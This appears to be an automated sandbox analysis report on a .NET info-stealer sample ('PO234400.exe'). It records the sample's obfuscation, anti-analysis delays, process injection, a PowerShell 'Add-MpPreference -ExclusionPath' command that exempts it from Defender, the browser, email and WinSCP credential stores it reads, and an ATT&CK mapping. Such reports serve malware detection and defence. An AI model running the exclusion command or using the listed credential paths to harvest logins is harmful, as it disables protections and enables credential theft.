                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, CpolQWAjBSp0XoohU7.cs | High entropy of concatenated method names: 'DqXX3kmqEq', 'rebXaPijdT', 'yHmXokomhB', 'kOZXnrWYKL', 'yTVXKAi18S', 'FWyXhwm2Wr', 'I6mkMqjjAV6gWbq1wI', 'rPK9EN66g4ZuQ7hQXj', 'pg0XXQL0pE', 'fYEXjnWGGm'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, hEhQkB2ZdTclJYwpZV.cs | High entropy of concatenated method names: 'Avse6hVs4q', 'A5lemXxhfn', 'qBeF2xahec', 'cwuFXSMHYw', 'ClSeT7oaqN', 'Rd7eqjxPON', 'lWeeBi0u3x', 'pVgeI8aHby', 'LcXeEqel3O', 'ExoePWYygO'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, TOioCChx7ZwAfc8sJP.cs | High entropy of concatenated method names: 'kgR383S6mA', 'EBT3faPsrK', 'pgS3bveFW8', 'nWSbmptxEB', 'MaYbzHqc08', 'uNC32YV95g', 'UPi3XwIPKK', 'P523MuI8tZ', 'QwY3jp9XwV', 'dXH3AjrpSE'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, tK0XW14eOIiwDBeNYRA.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XyUuIScM5J', 'yjDuEAZ9iI', 'y9uuPfxgFi', 'JiVuZVo4yJ', 'jhFudvv8kC', 'KDAuystY6o', 'aQouxrcs0a'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, V6gdXUqy5MOlrIu7PW.cs | High entropy of concatenated method names: 'ztkKDfMmen', 'MXYKqce8TY', 'sMjKIXZ5V3', 'iIRKEDJGmc', 'GDnKVby7WW', 'N6JK0thbNu', 'pTbKCHQHAl', 'pD0KJW51Ot', 'AOeKvlqaUt', 'zoSKpeiOa4'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, ITTa6Q4XFHgRdBeiMdF.cs | High entropy of concatenated method names: 'RgiNiDAqOr', 'fcsNRDjiV8', 'I6kNWdosCd', 'EDkNs2nnxh', 'iUsNHFZ8gq', 'VD3N1U5SlM', 'NJTNUO4C9d', 'nAINwok1Eo', 'qSUN5QPIwQ', 'KpENOvQ4AQ'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, aLVhkw7UQ3f0kK8ZEu.cs | High entropy of concatenated method names: 'oGvbr0M9WA', 'Ahsb4pQKuT', 'cGkbcRDs6M', 'I8Xb39jHWb', 'nQ1ba6OBEo', 'Xm7cd3HG0T', 'Whtcy2GuRJ', 'wYccxeT1Hm', 'RmRc6jtjrH', 'D8ZctVJtJS'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, HMbQwtzm8ENdW7OadK.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ADJNGPnBgV', 'KekNKScF4h', 'zG8NhYpC5F', 'wMfNeCZyZk', 'COPNFmCfNb', 'sBmNNAalZ0', 'fQRNuFiKu7'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, glyVrDHeWXfPMbiDx4.cs | High entropy of concatenated method names: 'lArF8mOR0T', 'UXtF4oX2BM', 'CQiFfASJZK', 'G3RFcvRC8y', 'rvmFbm6FeQ', 'dCmF3JdR9o', 'dS5FaE6wTg', 'AwrFQT003h', 'hMCFoCyyUL', 'd2sFn3KhuS'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, q3MIdHPT60Wa9gvcfC.cs | High entropy of concatenated method names: 'Bq8Gw5CTwh', 'jGuG5sRG2l', 'WJkG7W4KWG', 'HgIGVZ0fBB', 'ILSGC5QjjA', 'lbjGJ5rFma', 'vtwGpZRT0n', 'PoFGYvaS8o', 'xu3GD8Zxw4', 'g1xGTnQ4Ql'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, htDdwZkse3kWN2CecU.cs | High entropy of concatenated method names: 'zycfsm5sb2', 'MGGf1AEIAC', 'IgtfwGtfDs', 'aPGf5tQ11v', 'BEffKPN1RJ', 'c3Tfh62cQs', 'LIKfe3DP5i', 'H8ufF2UtOn', 'u9rfNlVmOl', 'XUmfuieYuI'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, barJkfKldSjloEQ6gN.cs | High entropy of concatenated method names: 'kCHWkK2CV', 'lAws2nw5n', 'Pkx1teJZf', 'vdiUxrnuu', 'hHM5DU0t8', 's9GOxm7vJ', 'jbrmhhZIqN5FRlHJdC', 'DUTVAHmraj5WPQst0a', 'mc0FDRufd', 'VTouX5TxQ'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, bgO281GQpjSekMRPQK.cs | High entropy of concatenated method names: 'ToString', 'evyhTpVjNK', 'kaQhV2oXK3', 'nsyh0WEasY', 'lGxhCXkZ41', 'miJhJgTDZJ', 'cBmhviR2aU', 'uHjhpRTOWU', 'KcphYlylqh', 'UtOhl6XeXT'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, Wd4UcV5MG836f5amMB.cs | High entropy of concatenated method names: 'PW3eoL7iBU', 'COyenPvYck', 'ToString', 'JUTe8ipaWI', 'EQie4IC7D0', 'WkqefMhYjZ', 'qDxecy93Um', 'VCPebyNHv4', 'cbQe3WF0Yi', 'YYTeaAL0jD'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, YmC0jQOf8YTrbWO2VG.cs | High entropy of concatenated method names: 'BUyNX5So1X', 'z2MNjQjttV', 'cMENA8cpR9', 'w7MN8pJOR3', 'FR6N4FcQuQ', 'JKNNcglXpA', 'hnBNbQf6VD', 'qB8FxG7ci3', 'x0yF6Pd5cD', 'tLFFta15pj'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, vQcKgrYfOr76aSFkqA.cs | High entropy of concatenated method names: 'Dispose', 'ysIXtxmDfR', 'rgMMV4qDyj', 'qOrkkAOvBW', 'WJDXm1ItqH', 'FLPXzDCKkP', 'ProcessDialogKey', 'cs2M25wsnB', 'KxIMX2Kknl', 'FPlMMsVyDH'
                        Source: C:\Users\user\Desktop\PO234400.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\PO234400.exe; Process information set: NOOPENFILEERRORBOX (57 identical entries)

                        Malware Analysis System Evasion

                        Source: Yara match; File source: Process Memory Space: PO234400.exe PID: 7276, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\PO234400.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\PO234400.exe; Memory allocated: 1260000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\PO234400.exe; Memory allocated: 2F10000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\PO234400.exe; Memory allocated: 14F0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\PO234400.exe; Memory allocated: 7B20000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\PO234400.exe; Memory allocated: 8B20000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\PO234400.exe; Memory allocated: 8DC0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\PO234400.exe; Memory allocated: 9DC0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\PO234400.exe; Memory allocated: 1600000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\PO234400.exe; Memory allocated: 31D0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\PO234400.exe; Memory allocated: 51D0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 (2 identical entries)
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 922337203685477 (2 identical entries)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4917
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1674
                        Source: C:\Users\user\Desktop\PO234400.exe; Window / User API: threadDelayed 1362
                        Source: C:\Users\user\Desktop\PO234400.exe; Window / User API: threadDelayed 3363
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7304; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7696; Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7656; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7692; Thread sleep count: 1362 > 30
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7692; Thread sleep count: 3363 > 30
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -11990383647911201s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -99873s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -99765s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -99656s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -99543s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -99436s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -99327s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -99216s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -99109s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -98999s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -98888s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -98781s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -98671s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -98561s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -98453s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -98343s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -98234s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -98124s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -98015s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -97906s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -97796s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\PO234400.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\PO234400.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\PO234400.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 (2 identical entries)
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 100000
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 99873
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 99765
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 99656
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 99543
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 99436
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 99327
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 99216
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 99109
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 98999
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 98888
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 98781
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 98671
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 98561
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 98453
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 98343
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 98234
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 98124
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 98015
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 97906
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 97796
                        Source: C:\Users\user\Desktop\PO234400.exe; Thread delayed: delay time: 922337203685477
                        Source: PO234400.exe, 00000006.00000002.2606405491.00000000014EF000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-
                        Source: C:\Users\user\Desktop\PO234400.exe; Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\PO234400.exe; Process token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\PO234400.exe; Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\PO234400.exe; Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\PO234400.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe (2 identical entries)
                        Source: C:\Users\user\Desktop\PO234400.exe; Memory written: C:\Users\user\Desktop\PO234400.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\Desktop\PO234400.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe
                        Source: C:\Users\user\Desktop\PO234400.exe; Process created: C:\Users\user\Desktop\PO234400.exe C:\Users\user\Desktop\PO234400.exe (2 identical entries)
                        Source: C:\Users\user\Desktop\PO234400.exe; Queries volume information: C:\Users\user\Desktop\PO234400.exe VolumeInformation
                        Source: C:\Users\user\Desktop\PO234400.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\PO234400.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\PO234400.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\PO234400.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\PO234400.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 identical entries)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 identical entries)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (2 identical entries)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (6 identical entries)
                        Source: C:\Users\user\Desktop\PO234400.exe; Queries volume information: C:\Users\user\Desktop\PO234400.exe VolumeInformation
                        Source: C:\Users\user\Desktop\PO234400.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\PO234400.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\PO234400.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\PO234400.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\Desktop\PO234400.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\PO234400.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\PO234400.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information

                        Source: Yara match; File source: 0.2.PO234400.exe.418b348.6.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 0.2.PO234400.exe.4162328.5.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 6.2.PO234400.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 0.2.PO234400.exe.418b348.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 0.2.PO234400.exe.4162328.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 00000006.00000002.2606062779.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000000.00000002.1379891077.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: dump.pcap, type: PCAP
                        Source: Yara match; File source: 00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000006.00000002.2607967300.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: Process Memory Space: PO234400.exe PID: 7516, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\PO234400.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Users\user\Desktop\PO234400.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\Desktop\PO234400.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Users\user\Desktop\PO234400.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\Desktop\PO234400.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 identical entries)
                        Source: C:\Users\user\Desktop\PO234400.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: C:\Users\user\Desktop\PO234400.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 00000006.00000002.2607967300.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PO234400.exe PID: 7516, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match | File source: 0.2.PO234400.exe.418b348.6.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.PO234400.exe.4162328.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 6.2.PO234400.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.PO234400.exe.418b348.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.PO234400.exe.4162328.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000006.00000002.2606062779.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.1379891077.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: dump.pcap, type: PCAP
                        Source: Yara match | File source: 00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000006.00000002.2607967300.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: PO234400.exe PID: 7516, type: MEMORYSTR

                        MITRE ATT&CK Matrix (one line per tactic, techniques listed top to bottom as in the matrix; a number in front of a technique is the report's signature count for it)

                        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                        Execution: 121 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                        Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                        Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                        Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 141 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading
                        Credential Access: 1 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                        Discovery: 111 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 24 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
                        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                        Collection: 1 Email Collection; 11 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                        Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                        Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Source | Detection | Scanner | Label
                        PO234400.exe | 61% | ReversingLabs | Win32.Spyware.Negasteal
                        PO234400.exe | 100% | Joe Sandbox ML |
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches

